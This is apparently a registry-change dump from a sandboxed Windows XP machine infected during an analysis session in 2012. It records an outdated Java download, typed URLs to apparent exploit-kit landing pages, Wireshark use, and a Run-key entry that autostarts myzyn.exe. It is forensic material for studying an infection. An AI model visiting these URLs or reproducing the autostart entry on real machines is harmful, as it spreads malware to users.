HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowAlbumArt dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences RandomFolderName "0009236B"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LastPlaylist hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LastPlaylistQuery ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LastPlaylistIndex dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyStyle dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyName ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyPort dword:00000050
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyBypass dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyExclude ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyStyle dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyName ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyPort dword:000006db
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyBypass dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyExclude ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyStyle dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyName ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyPort dword:0000022a
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyBypass dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyExclude ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions DesktopShortcut "no"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions QuickLaunchShortcut "yes"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\CreatedLinks Shortcut4 "C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache 0 hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU a hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU MRUList "a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU MRUList "a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* MRUList "a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs Order hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00, 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage ProgramsCache hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f, 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage StartMenu_Balloon_Time hex:b0,27,b0,17,df,98,cd,01, hex:f0,f5,4b,1c,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01, hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5 hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0} hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00, hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Type dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Flags dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Count dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Type dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Flags dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Count dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03, hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Count dword:00000002 dword:00000007
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore Time hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01, hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore LoadTime dword:0000000c dword:00000009
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SavedLegacySettings hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00, hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Orimdie ""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached {2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401 hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01, hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached {2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401 hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01, hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU NodeSlots hex:02, hex:02,02,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU MRUListEx hex:00,00,00,00,ff,ff,ff,ff, hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU 1 hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1 NodeSlot dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1 MRUListEx hex:ff,ff,ff,ff,
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell FolderType "MyDocuments"
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache @explorer.exe,-7004 "Opens your Internet browser."
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url1 "http://www.google.com/" "http://46.249.59.116/main.php?page=5a56c997ffff2f79"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url2 "http://google.com/" "http://www.google.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url3 "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775" "http://ns8.ns360.info/main.php?page=f61d19dee2176c62"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url4 "http://urlquery.net/" "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url5 "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC" "http://urlquery.net/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url6 "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html" "http://google.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url7 "http://oldversion.com/" "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url8 "http://go.microsoft.com/fwlink/?LinkId=69157" "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url9 "http://oldversion.com/"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs url10 "http://go.microsoft.com/fwlink/?LinkId=69157"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\DropDown
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Health
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332} AttemptedAutoRun dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5 hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01, hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01, hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0} hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01, hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00, hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX UpdateSchedule dword:00000011
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX UpdateScheduleMinutes dword:0000001a
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX Frequency dword:00000020
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX LastUpdateInvokedTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication Name "java.exe"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager Server ID dword:00000004
